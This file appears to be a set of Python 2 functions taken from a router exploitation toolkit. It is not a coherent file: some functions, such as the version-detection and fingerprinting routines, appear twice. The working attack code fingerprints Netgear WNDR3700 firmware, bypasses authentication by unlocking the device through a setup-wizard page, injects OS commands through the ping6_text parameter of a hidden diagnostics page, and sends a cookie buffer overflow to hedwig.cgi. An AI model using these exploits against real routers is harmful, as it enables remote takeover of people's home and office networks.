def WNDR3700_version_detect(host,logger=None):
client=HttpClient()
version=None
url="http://%s" % host
print "trying %s" %url
try:
client.send(url)
except HTTPError as httpe:
basic_realm=httpe.headers['www-authenticate']
#all known v3 firmwares put WNDR3700v3 in basic realm header
if basic_realm and "WNDR3700v3" in basic_realm:
document=None
try:
document=client.send("http://%s/genie_apply.htm" % host)
except HTTPError as httpe:
#1.0.0.18 does not have genie and instead returns 401
if httpe.code==401:
if logger:
logger.LOG_INFO("Got version 1.0.0.18")
version=WNDR3700_VERSIONS["1.0.0.18"]
if document:
#1.0.0.22 does have genie and genie_apply.htm does not require auth
if logger:
logger.LOG_INFO("Got version 1.0.0.22")
version = WNDR3700_VERSIONS["1.0.0.22"]
if not version:
raise Exception("WNDR3700 version not detected.")
return version
def inject_command(command,target,port=80,logger=None,https=False):
if not logger:
logger=Logging()
client=HttpClient()
protocol="http"
if https:
protocol="https"
url="%s://%s:%d/ping6_traceroute6_hidden_info.htm" % (protocol,target,port)
logger.LOG_INFO("Requesting ping6_traceroute6_hidden_info.htm in order to obtain timestamp.")
resp=client.send(url)
timestamp=extract_timestamp(resp)
if timestamp:
logger.LOG_DEBUG("Got timestamp: %s" % timestamp)
else:
logger.LOG_WARN("Couldn't extract timestamp from response.")
raise Exception()
url="%s://%s:%d/apply.cgi?/ping6_traceroute6_hidden_info.htm" % (protocol,target,port)
url+="%20timestamp="+timestamp
logger.LOG_DEBUG("URL: %s" % url)
post_data={}
post_data["submit_flag"]="ping6"
post_data["ping6_text"]=command
post_data["traceroute6_text"]=""
client.send(url,post_data=post_data,urlencode=True)
def relock_target(target,port=80,logger=None,https=False):
if not logger:
logger=Logging()
protocol="http"
if https:
protocol="https"
if not is_unlocked(target,port=port,https=https):
logger.LOG_INFO("Target is already locked!")
return
client=HttpClient()
url="%s://%s:%d/BRS_success.html" %(protocol,target,port)
logger.LOG_INFO("Requesting BRS_success.html in order to obtain timestamp.")
resp=client.send(url)
timestamp=extract_timestamp(resp)
if not timestamp:
logger.LOG_WARN("Couldn't extract timestamp from response.")
else:
logger.LOG_DEBUG("Timestamp: %s" % timestamp)
url=("%s://%s:%d/apply.cgi?/" % (protocol,target,port)+
"BRS_netgear_success.html%20timestamp=" + timestamp)
post_data={"submit_flag":"hijack_success",
"click_flag":"0"}
resp=client.send(url,post_data=post_data,urlencode=True)
def WNDR3700_version_detect(host, logger=None):
client = HttpClient()
version = None
url = "http://%s" % host
print "trying %s" % url
try:
client.send(url)
except HTTPError as httpe:
basic_realm = httpe.headers['www-authenticate']
#all known v3 firmwares put WNDR3700v3 in basic realm header
if basic_realm and "WNDR3700v3" in basic_realm:
document = None
try:
document = client.send("http://%s/genie_apply.htm" % host)
except HTTPError as httpe:
#1.0.0.18 does not have genie and instead returns 401
if httpe.code == 401:
if logger:
logger.LOG_INFO("Got version 1.0.0.18")
version = WNDR3700_VERSIONS["1.0.0.18"]
if document:
#1.0.0.22 does have genie and genie_apply.htm does not require auth
if logger:
logger.LOG_INFO("Got version 1.0.0.22")
version = WNDR3700_VERSIONS["1.0.0.22"]
if not version:
raise Exception("WNDR3700 version not detected.")
return version
def send_overflow(buf,target_ip,logger):
client=HttpClient()
headers={}
headers["Referer"]="http://192.168.0.1/bsc_wlan.php"
headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
headers["Connection"]="keep-alive"
headers["Cookie"]="uid=%s" % str(buf)
url="http://%s/hedwig.cgi" % target_ip
post_data='SERVICES=WIFI.PHYINF,RUNTIME.PHYINF,RUNTIME.DFS'
logger.LOG_INFO("Sending post request.")
try:
client.send(url,headers=headers,post_data=post_data,urlencode=True)
except Exception as e:
print e
return
def unlock_target(target,port=80,logger=None,https=False):
if not logger:
logger=Logging()
protocol="http"
if https:
protocol="https"
if is_unlocked(target,port=port,https=https):
logger.LOG_INFO("Target is already unlocked.")
return
else:
logger.LOG_INFO("Unlocking target.")
client=HttpClient()
url="%s://%s:%d/BRS_02_genieHelp.html" % (protocol,target,port)
client.send(url)
if is_unlocked(target,port=port,https=https):
logger.LOG_INFO("Target unlocked!")
else:
logger.LOG_WARN("Target unlock failed!")
raise Exception("Unlock failed.")
def is_unlocked(target,port=80,https=False):
logger=Logging()
protocol="http"
if https:
protocol="https"
client=HttpClient()
url="%s://%s:%d/index.htm" % (protocol,target,port)
unlocked = False
try:
client.send(url)
unlocked=True
except HTTPError as e:
logger.LOG_DEBUG("Got code: %s" % e.code)
if e.code == 401:
unlocked=False
else:
raise
return unlocked
def fingerprint_netgear_version(target, port=80, https=False):
client = HttpClient()
protocol = "http"
if https:
protocol = "https"
url = "%s://%s:%d/currentsetting.htm" % (protocol, target, port)
try:
resp = client.send(url)
except HTTPError as e:
if e.code == 401 or e.code == 404:
return {}
else:
raise
lines = resp.splitlines()
fingerprint = {}
for line in lines:
(k, v) = line.strip().split("=")
fingerprint[k] = v
return fingerprint
def fingerprint_netgear_version(target,port=80,https=False):
client=HttpClient()
protocol="http"
if https:
protocol="https"
url="%s://%s:%d/currentsetting.htm" % (protocol,target,port)
try:
resp=client.send(url)
except HTTPError as e:
if e.code==401 or e.code == 404:
return {}
else:
raise
lines=resp.splitlines()
fingerprint={}
for line in lines:
(k,v)=line.strip().split("=")
fingerprint[k]=v
return fingerprint